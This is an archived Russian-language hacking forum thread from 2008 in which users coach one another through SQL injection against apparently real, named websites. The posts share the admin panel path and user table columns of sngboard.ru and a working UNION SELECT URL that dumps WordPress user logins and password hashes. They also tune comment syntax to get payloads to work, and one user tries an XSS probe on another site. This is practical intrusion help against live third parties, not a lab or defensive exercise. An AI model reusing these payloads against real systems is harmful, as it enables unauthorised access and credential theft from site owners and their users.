ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.11.2008, 21:02
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Вот админка
http://www.sngboard.ru/Admin/
(надо с большой буквы).
2 hulk
Вот все колонки в этой таблице
email
id
firstname
lastname
password
phone
|
|
|
05.11.2008, 21:04
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
@diznt
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
/* пробовал? Если использовать --, то нужно так:
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20-
также пробуй #
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23 |
|
|
|
05.11.2008, 21:15
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая.
Попробуй подзапросы
+and+substring(version(),1,1)=5--
(4,3)
|
|
|
|
05.11.2008, 21:17
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
@beerhack
чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт
http://www.blacktoad.info/releases/dir_parsing.txt
@jokester
И нужно писать их маленькими буквами
в MySQL регистр таблиц и колонок не имеет значения |
|
|
|
05.11.2008, 21:20
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- .
если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
|
|
|
|
05.11.2008, 21:26
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от [Raz0r]
@jokester
в MySQL регистр таблиц и колонок не имеет значения
Ты вместо того, что-бы написать это посмотрел-бы линк.
Я не говорил про mysql, я говорил про этот пример
Вот линки :
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/*
Table 'wordpress.WP_USERS' doesn't exist
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
вывод
|
|
|
|
05.11.2008, 21:31
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Сообщение от [Raz0r]
если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
Почему это "необходимо"? Вообще ни разу не юзал --%20, у меня работает и "--" на ура.
|
|
|
|
05.11.2008, 21:51
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://dev.mysql.com/doc/refman/5.0/en/comments.html
http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html
Последний раз редактировалось [Raz0r]; 05.11.2008 в 21:54..
|
|
|
|
07.11.2008, 01:45
|
|
студент
Регистрация: 30.07.2007
Сообщений: 800
Провел на форуме:
4275992
Репутация:
1188
|
|
при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение:
Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7
что это может быть?
ps/ сильно не пинать я только начинаю)
-------------EDIT---------------------
комменты и так не работают...
спс desTiny )
-------------EDIT---------------------
Последний раз редактировалось NetSter; 07.11.2008 в 14:53..
Причина: спс desTiny
|
|
|
|
07.11.2008, 02:17
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Как понять? При подборе столбцов через order by принтит стандартную ошибку
Unknown column '100' in 'order clause'
Но и при 1 пишет
Unknown column '1' in 'order clause'
Юнион селект эррорят.
Первый раз сталкиваюсь.
|
|
|
|
|
|
|
|
Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?928502){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?928528){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?928535){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?928596){kind=avatar}
Похожие темы
Линейный вид
